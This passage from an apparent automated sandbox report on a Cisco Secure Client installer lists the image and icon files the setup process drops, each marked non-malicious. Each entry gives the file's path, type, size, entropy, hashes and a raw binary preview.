                                                                                                                                      SSDEEP:48:aYtizXuhGfrlz7ES0+AXMzboB3CiWBgvnUeHAG:nkVFNA8Pq39/UegG
                                                                                                                                      MD5:513D5EA87AFF39BFAC791F6A1AEA44B6
                                                                                                                                      SHA1:1858020A95D380478119D11C567D686B3097CEC7
                                                                                                                                      SHA-256:E04B608228DB3AB98917F8B62BB3F64FFBC6E272FFD2B84B2CEB752838FE4485
                                                                                                                                      SHA-512:2F26AECB0AE3B423B79B4EFDF7CFF8535236E62102F0F4DB9C98A88243B3B1A6EE5CB30F6D049FC3F5E19ABBF22C5DF19805ACB2F7FD3BEB77D7D33AA351E5D5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..{lSU...vK.nl%.6..... ...0.q#D.?d....C1!j..G.Q0.,A:b.q..5d...L%...H..I@.9..B.G..E.=.SN.n....n.&..]...........A1..Z\BD6"..G.?..AD.~....l?...G...Z.KD.DTAD%.{.V,a....(#=..{..a:........)/.H-Dt..l.f....l-.p(5.;.ge2 E.K.....ro?....9v.9.....r.m...8.-.....JW.....K............\..]OP..R...lz...J...|P..uP.-.*..J3 ...Ui.......OxcK..@...L.Bl..8....{M.b...m.b.1....^.(...UG.M..2[..x..k.[K;.=G.SR5.....Fh{...|..qo..8....PR._0[..&...SR....^..(M.d6.B .Lek...<j;}.r.s..k........q8M........z..5..MkV/..?]J......kw8.B.b..:...qW...U.g^..O.}.|/$@.s..0].r..twR..o.7.....4.J.Gs-6.....C.@..Ho8.s..0u...{..r3.Ri.S.U.B....Vm...Y...9.K}.`..7U..y..I.....j................+..d.p].'.>.O..U.....<....F..X.....9.M..5w....e>@wO[.<C).r.|.Z.....e.....t..>............E].N:xa...,)Y....T4.a.~.U..0.^U8.A..............|Y.....@O...)?)..9.v^...W.#.2-M.:M.@..O.......l....T..L.....,..P.''...E...ZUX@-..P.V&eX.......M*...<.c+.A....K...V.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-1BKBG.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12124
                                                                                                                                      Entropy (8bit):7.978101118980993
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:6QcIfCBldrUhS+mzFAXOk03y4nRFoVKX22ZSsnVqzY5oarRl75w1/i5IxehvNbim:6QcRBld2S+m5AOTRaI22ZSgVq053t5ww
                                                                                                                                      MD5:5B846635AC3DA9C8E857C042ED0EA2F6
                                                                                                                                      SHA1:B439FC64436B74900F453ED2480C8CA547CBCDCC
                                                                                                                                      SHA-256:9C6135A6176AC9D00E1BD4307A3111BBECD39814DB18212DA1D55916A4EEDB4F
                                                                                                                                      SHA-512:0A58ED5105CFB87DD3F91675734171989C0A36B572BA2D20706CC831E0DAD9DB37175754E405680B4DEE4D6D958DA63B89413E2B6D2725A84C95932F8D123323
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx...|....O..ZY.Z..!XT* ..,.%...n.R...R.,..)....Vy+..[+..DmA.l).&i.Xi!.XwB.....c....o.;...;..<.L2....<.l..{.9..s(.d..#3;....5...}....]#i.On.....F..G,O&}.]..m.l..rN.k.Jm}Me[...n........Lwe:...f.}`.k7]8......D........v.'(....t.E...^.v......n.....HO";.{.l.2...DX.6._.../.'.=.'9.#....9=... .z....-.>p..~..G......:H..=v...SV.....>..K...w....PYI.....G.mx+2;]az...|...>{...............m.j.*..'x.........n......q..T.9.ew........j'...W..D....-......6)....N2k.,z...+......0..z.x.......z.&./..?..;.0;..+....7Zg.w...B.Y*..qD.....9..G.......9~........S...O..._TTT...Qy\[.(..#c.k*......<..]k.^.c.Lv".5H... e...D./N'.E..tJ....TO.L?A......'..n...*/.....).vwA.bgRS..m.....+.m]~P'8.m.......p.t..a.=....Y.I...$..nO..$....~......m.7..........P.$g.......#.a.>c......;...Y...\.|7.]...S.z..C....=..c.f.2{\..g.h8..v@(....4.....e..fj..Q..{.E.'..../j?|.v..]s...R.......:..;.t.8....'.....x5..#...C..djj..U...8...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-1KEC0.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.5904244181066343
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:qp/EF2cJeBcktRYgD9qsSyGrnPblkbGgmo:YccB8lPbGHB
                                                                                                                                      MD5:A1C46D32AA7BCD14A8DB10005E23B885
                                                                                                                                      SHA1:8859CD29B7D6A9D645C3B09D8AFAB041D3BB7A37
                                                                                                                                      SHA-256:66DAAB72327F0E98FC3006DA7B0F957901285993388BDE25D6149464A98C9442
                                                                                                                                      SHA-512:16CC5F81EC30BC027D6C3268383463968DD9E2C0A0A3BBDA8059BF8DC6A99853ED27CD1E1BD955ACF2F98B5B0693D5A2AEDCC69261F2E06B065ED11684179AD9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ..........................@...@...@...@...@...@...@...@...@...@...@...@...@...@.........................p...0.............................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................................p.....................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..M'..M'..M'..M'..nP:...w................`.............................@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..z]J.z]J.X5..M'..M'..M'..M'..z]J......................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.........................nP:.M'..M'..M'...................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................M'..M'..M'..M'...xh..........................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................cB+.M'..z]J.M'..M'...xh......................@...s...s...s...s...s...s

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-1KR2E.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1601
                                                                                                                                      Entropy (8bit):6.020486157649533
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNAG+ojoyMmcI1VYj41jCw1jaPl3VYjJoUHH3yG3:g/6G6GknA9Wg2O0y/c0CKum23CuUHiWV
                                                                                                                                      MD5:F999F81B91475C98DE33D66E186DF2CA
                                                                                                                                      SHA1:397B889C5AA95A25FFBD128656BE5D91A71F3275
                                                                                                                                      SHA-256:F807E26DA3A4BBFBD9552D2D50FB0F5FC28AAC46635470E3F834C2042C05310B
                                                                                                                                      SHA-512:2A43CB4EFC414F8FAE4EA173FB53CF2819975C76170DCEE4A995B3A74786C167C26DF258E1E589ECD92DECB999683EA38C6C4882CC2E299313C9357080521844
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T17:58:51-04:00" xmp:MetadataDate="2018-10-19T17:58:51-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c57f0649-d423-40eb-938e-eeff8347c1a5" xmpMM:DocumentID="xmp.did:c57f0649-d423-40eb-938e-eeff8347c1a5"

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-29MID.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):421
                                                                                                                                      Entropy (8bit):7.268682924293009
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:6v/lhPZqI9EI0An9BZXg/f/8q+psYee5BtD9n1XOoLZNxdj8hVHPHQHEPisVp:6v/7kNDC9EoRtBthgwTSrPXPis7
                                                                                                                                      MD5:E36649875C18E56654D70D70405A64C4
                                                                                                                                      SHA1:F5AFE1F32062F5F8F3C036BC4C41FD4056ADE29F
                                                                                                                                      SHA-256:794A18D1D80F273108935EF4A9F1B1449EFD80E79DFC1546A410998CB2121933
                                                                                                                                      SHA-512:2EAF13B01B63712C50D5FAF9B5785468BC8444EDE766F9F89FDECAEAC5CE003A7962B7451607AA23064E5EB4E2DBDB3568713681BA778AFE1CBCCC8DA07426B4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~....WIDATH..U.m.0..".`...n@&..N.J..e.Ke.t.....x.2.#T.v...Z=)R..w.>.3r..*~.....k.k.).q....^.....`.k..'.tG.......X.:Kf..=..7-........Md..`.....L.H.{..K.%D.~.i.$.F..z....*]Q....Y@.f..D...C|j.!\gi...q..R.1...2..K.....=..,..%...p+.(iW....#......r....N...=........C.8[..\<.a....2[n....B, #...u.09......a...;........._U.)K2...pb.LW...~^.......hSX.....IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-2H067.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3884
                                                                                                                                      Entropy (8bit):6.749338244156901
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgJLkXf:iXHt+JcNgOSiS4XsAYNpf2ESNtg1kXf
                                                                                                                                      MD5:ECBD0E4A17836F184F084BF3D9170141
                                                                                                                                      SHA1:45E135215179398684C1D52BB8430D827577500D
                                                                                                                                      SHA-256:5734B02A7A809DC54D75C00E7137CE9F2BF85CE8050B6105016FEE5D5E1BA44B
                                                                                                                                      SHA-512:5EB8B7519E6F9EE518812B3F0D8DF3C3E6A73A899E70F853848C69551B783663111B62900837CF0F02098A7452EE3D8638839658B3724990BFA5C2BF148B8D05
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-34OKB.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):4.010961844615086
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:+9/hYGSEklnePwwDIr4LcARtTmOj/FrzFkT7goo:+9/CGShEPJcX87v
                                                                                                                                      MD5:393317DEF43F554C69A8ED63065E5BBE
                                                                                                                                      SHA1:09185B8B3C21C5CFB6661958665B6D997BF64E6F
                                                                                                                                      SHA-256:92ACFDA492B05FAA52BD32E9581F028BEE55F1C5AF617ACD8EE9E6985C9D1CBD
                                                                                                                                      SHA-512:9C7B0D37DA9080F27F0116F0C45AA5CD2D9480955433D60CCEE1555C0D930081655705C65565C7C18B766458530FA5B8DD641E7D2F8776BBB8650B7D3A95351C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................@................................IA.P..s...s...s...s...s...s...s@............................................................................................b[....y.&...,...0 ..0 ..,...&.....y...s...s......................................................xh.cB+.M'..M'..M'..M'..J&..$.`.".../...0 ..0 ..0 ..0 ..0 ..0 ../...".....s...s.........................................z]J.M'..M'..M'..M'..z]J.z]J.z]J.+.S."...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..".....s........................0..........w.M'..M'..X5...xh.......................y./...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ../.....y...s@........................z]J.M'..M'...xh.........................qj..&...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..&.....s.....................z]J.M'..X5.................................8/..,...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..,.....s...................w.M'..X5

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-3GS8I.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26674
                                                                                                                                      Entropy (8bit):7.935979285003627
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:YFyemvD4Gm3D6kkgmo+C24RkZErZWiTVCbFk:YryD4G+Dcgmo+C9kZsZWpFk
                                                                                                                                      MD5:B1655EC01B232A1A42E43F950321285A
                                                                                                                                      SHA1:F34C1F228C66BF4ED1B0E9901D3284EBD7A01600
                                                                                                                                      SHA-256:9E2447F1B7B4A3404C8D3588DAB59CF51635049BE4F1FC0D1BDEE77DEFFC5B47
                                                                                                                                      SHA-512:BCC1BC2AE795109EF83422613D9B0D9FF23EA81136479748FFA7CD7FC03D527B4744833728637F7892B5F60DD476F1F32122AECCCC26DB2D6092CD2346A750BA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..Oh%G...G........4..TSG.nO....j..CI.s.7%...fa..ofQ*...x;...<^/,y1.a.R...RA/.f!..)...R....\K..]......'Od..........d.tN.<...../.O.9>.............}.P8e.M.:8.'#........z.Z;.)K.,--%..'.?a..GB...[1r..I\2...4?..SKN|`. ..E..n..hz..mll.z".KhG\>.i.2....;.....|\.ywww.......a..{2*..Io~.UO..t*...'ckk....~.....zB*......I.R.T9!.OF...|...e(z#.N....o.P.+eOH...]..~..@..!...=*....'>...+O\.u..Z.yo...{.......2ieX9..(.Br):.k!..I.c.}S.'cccc..F.......0q"l...k....ve.>...p.coRw2r.D.[...}....h>.Q.*B<.......y...{&B.<...{...9.e7`.......w...*\.Mt..EU...h.].....r.G..;y..`.d..C6.Y.z#.f.r2.y.5.W.<.#!..!..[.5.yp;...OFL.Brv.V.uoe..O....aV.2.p2....d.t.C..'..e...Q7-.g...._...3.N<....}D:.`3.....n.^.0..X.VF..f.'.u...W...p}.(Y.#......M?.......r4.|...*...@).GGz/`...U....3............F.C...[.5...;..kv.[...+k3$......N...c......j.B(..Z...k....&...8.._..E..M..(I..u..Td.....R....C.......b....E/X;....#..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-3MK0E.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9482
                                                                                                                                      Entropy (8bit):7.969513879342907
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:LXNXFLy+vMbgQbCoVANBzT84c2blwwjla7:rNX5ggQOoVIzwHwxA
                                                                                                                                      MD5:21841588532E34397E478E791A064F2C
                                                                                                                                      SHA1:90C0BEAC3D3A1288FB7BED658835BB6710E67922
                                                                                                                                      SHA-256:9D0F626E21D3324BE7CB473D44514737D9A9145B86E73F67EBFD6DE308B36FCC
                                                                                                                                      SHA-512:B0006DD98C201AD06F79166FD53F67C61C60C48C1506153EA47AB7F38A7D4F6CCACDF9E369AC0EFAD36B396786EDFD1FBEF8302D1F2B1F82BE6D784936ED6CB0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx..ml]......$..B.^..R.BI.mPB..i..B.I.D*.B...i...b7M...B...TI.CU..K..*.6%.\.5...T.....B.iU....U...x.d..y=g.9...dp..{.s.y^.y!e.1....z..BN...........[.~..X......Q.PO.w.!......k.d.M........x....y....<....O.oe.o."<...d..f.&2..".....(..{..}..C....]y..).xq.]...7....M....{......:'..'^.......9..0.._..~....#3.^M.t.0.....................\v].3.b.....ONz{.._..........m_..\..5W.buE...q..>...xE.+qA{E>^._.....f(...p5..s.fgI............_.z./.+V.>N.....D..). .q..9..!..9#..-(...^...G...].E.l.>..2...o..t/"C...x.\........u/ S|R..)-WMK..1..\..{..&..w..V.^...U8_A(l...Jp.....y.#..b{5:...F0-..N.c..ne..5....&.Kf(j7O....../0..N.[K.#Q|.K..cfjb;..N.....8.{....n#.j.O...Z._;.m.jWfp~.............. .w.}.<....\1X?+..4bi]..H)../.".....f.&N^......8..S..]...3..Cn..z]l.,........_...ek.e.F.-w?....i..i.B&./..........>.|r...Ii!....Q...t2._..HHCBx..B...<?35.J.....V/..s-...[..k..V.v.a.50..teS..w`fjbm....qC.....;89+!/@.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-3QR6F.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13810
                                                                                                                                      Entropy (8bit):7.9753795366170355
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:9UvTt4Skm1eC/3ndqwLk01JZ1GUhDYLk6pb2IloPTCDnnd:9qeSXeC/7TYpb2jSnd
                                                                                                                                      MD5:276699732D96B797E30C6092A6B9A3C8
                                                                                                                                      SHA1:9430D64617EC4CAA2895D0755824E556568FDC70
                                                                                                                                      SHA-256:217DD0FA6E750A6E5E422744ED0650204519942130254825CBE87B16E5E5AAAD
                                                                                                                                      SHA-512:884D6A9A105697FD5F4F4032FA14C967826937D42E6B88FD6D8DECC3B03AE0296588CF1D093673765C16CD65872405F52986303DF2453D50DDCA6F540082DA0E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x....B.R .w4..-.p-b..o".....`U.R+.+..=..<....J.b...."..U...ATD.....R....G. ..Nf.k.^k..k.%........3..o}..T...y........Pkt......r..wj_.~z...^....l|2....L._...>.I.../..^...N.6.$...:Q.N.iK.........V...X%N&.[Q.-c'....W.p,~U..-...S.....N.z~.w. .....;..<..>.?..._oK....w......3..[U[.....o.?..U.>.[...lR...D...u.w.../n.Y...{.x8O...M,......;.d<..1.._7).D&`.....N..3jx.g.S.[....N.n#..^?H...x.'.^}.i......_H.....I~1..;.S....;;.......x.w...............~@oly.;....F..]...i.?.P.6m..Q...#%.%...$<.p..W]...'.A....._uL;.o......_~.>........L..O.}..b....I.Gae.n....U..Y.6m.....+.-4.;.].............p...A..g.../...N..+(.$...n..S..&.....\z...]..y..v...?[...=.NZ.\.*...#.J***f.q`#..*H..W.45.V.{...G..<IT..'K.f*;Q.Vz.....u7.W";AT....1.-_.$.'d...-.<.c^o%::..L.%N<.+sLVc,.q.^'..i5&*/.6.....i*...Y.N......4$.!(...p1..6U..._.8....#{g.A..@.R.#..)........i............ ..F..S.......Qf.~..u..9......M..cN:.7F'..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-4BC20.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5803
                                                                                                                                      Entropy (8bit):7.950077949239442
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:eRHNludLinPdADSlBP/5X48lHE6uXPk1HFlQ0vmHSQON0hYRGRkA3rGWjrXM:UHNludLjM/FvhE8FlRRJG1r5jA
                                                                                                                                      MD5:1F00D2A16D3C303C76359276E6983553
                                                                                                                                      SHA1:9B58E65D2A01B1E55173370BBED7CFFB72C683D2
                                                                                                                                      SHA-256:F70F49DED3EB450D26AABC8F71AE8C1BF63D2C01A1C55C6A19E010FAD602011E
                                                                                                                                      SHA-512:C65A78144AB84A68DEFAB93704D20AB177E2BB82138FCD47171289D164F938D7D9620AEB22ABE234CDC79DE2CB28AF1A2B780845D873409DF0B89A60C34D425F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............>a.....pHYs...........~....]IDATx..]{l[.y..."-?r...:.e'K..).9.R...%h.......0..m.?.y[.a. ...x.C.6t.......N.u3.......FJ.d..Dt.%.._.%>..;<7.)..;..R...@K...=.|..}.|..h..6.h.....U2.(......c.g...<..c.1@L..[....D"....F.4..3..MM.h.N.....9-..U..e.... .."...Ad.....>*'..lF......d.0.8....4E+..O..i.V<.....5==m5.x..w.......8^.b<JD.H.....&''.Fp'./....>.6.z...MO....T*.2D....}E.e...6. .I.z....fffZ..u.>...DL.1....acW.0.2....U.{.........W.c..!%W0W=. .......U.*0F.U...e....B..b.......c.Z...JW.\.... D.#.....h4.H...W.5F.w..;'~..o."...%..l.....|.#.w.......~"....H.^V.f2.f.x<.7GGGk..u."....?...1....}.3.......d2..L.|C...k...>.wo9.b/.p.r.. k....r`.2).m.u.8.*3$.I.....$=..@3. a.f<.J...A...E./$.8.4MY....u.Sh.#.1..,A..?.BR2.g....h4.......2......S4.2..S&....!.....B.J........d..........n.}w.0..]...t.5.x............Z.s_B.Y....f...?..A!..!.&#.&...|C!GV>K..z.jh.U_..x..n2@.4............0J../...Y.sD..I7.7F.........kKD..@l....">.. .g..K|..|./.1...&@.A.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-54F28.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12780
                                                                                                                                      Entropy (8bit):7.975972884511595
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:eS01CYt7F9/5i2XPFK02VBVDNP/RqOMGkw9j:e1th95PqjP/E1A
                                                                                                                                      MD5:1CE2626120CD6B69683255C71552896B
                                                                                                                                      SHA1:4230DF12A00E6B13CAB39EFB1C44DCBF5B656087
                                                                                                                                      SHA-256:B55ABBF6754B131C33947DCA3511D219B2AB2DC5D7E8945BF3C6A2E9FB0FEB23
                                                                                                                                      SHA-512:A197A76FB7DB9FEF68E3A49DE4C134EFB41472773F323BF4F8AB3B610174FD75C15848BB42CFC2D4240D72EFA66FF4CFFE02DDA28323279C87C7019E167F724B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.tT..7>rk.....I...R.....6D../...T@..._.A[..$rkA.D..U0......W.EI..(...^.TC.TX>...eD......>{.>g...d~k.Jf....;....G.BB.<y..#N.6.i}......#.~......G.~......s..~...5..V...N......'.=..$.........K..a{.c.........:...3.....:.L...KWu.{.._..../<.Z...n.y..../.e{.i.3.......[.O`|..h.+../........M#._....s..G.3hO....j.._&..?...s=.<._\~I/..9....W..I.....u.tq..}..7.G;....h........f.G.v.h<....c...7.0.1....d[...^.......D"1....[.ilC..=@.6.U.O0.......P.......D.t..K..}.6M._*.....6._:h.'.Ix.htP..l.N.4.........$.m.......:........+..o<.../Ly]..p.....+...y.._.........t..........7..g...D..Y..A.........n.....9.....D."j.9....>]p.ly...........N.<....IaT..N'S..'..4.Nd.ntN........;..<d;..^..:...0...m.?).....Q..X.`).......%....!...........'..'...M2M.?..D..3{_[....jdpY.tW.i.....5Wep......Jj7....IJ....g.?M..).\}Bkc]....~u...~...w......!.x..w.......;)~NL...L.;wN............\j.[.N.Dt...EB.c:.....b..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-5AFAL.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3881
                                                                                                                                      Entropy (8bit):6.749191813135782
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgI+P:iXHt+JcNgOSiS4XsAYNpf2ESNtgB
                                                                                                                                      MD5:C09256A999756AFFAE49A6E4346D910C
                                                                                                                                      SHA1:95158F9717019700B626D2A675F17C50853E436E
                                                                                                                                      SHA-256:D2913B404D604DD9F61952E0539DA5FCD742FC7E87F30CCC4263303DEC5F43B0
                                                                                                                                      SHA-512:D2DD40D4A8FBFEC4DFB2EF285880F103CB50D0AB461731915C15D8A4061E77C70513658419FF72925D90741FBD75079899E5293A107B7361B2142358534C94EA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\is-6FDGR.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4370
                                                                                                                                      Entropy (8bit):7.900909498577029
                                                                                                                                      Encrypted:false
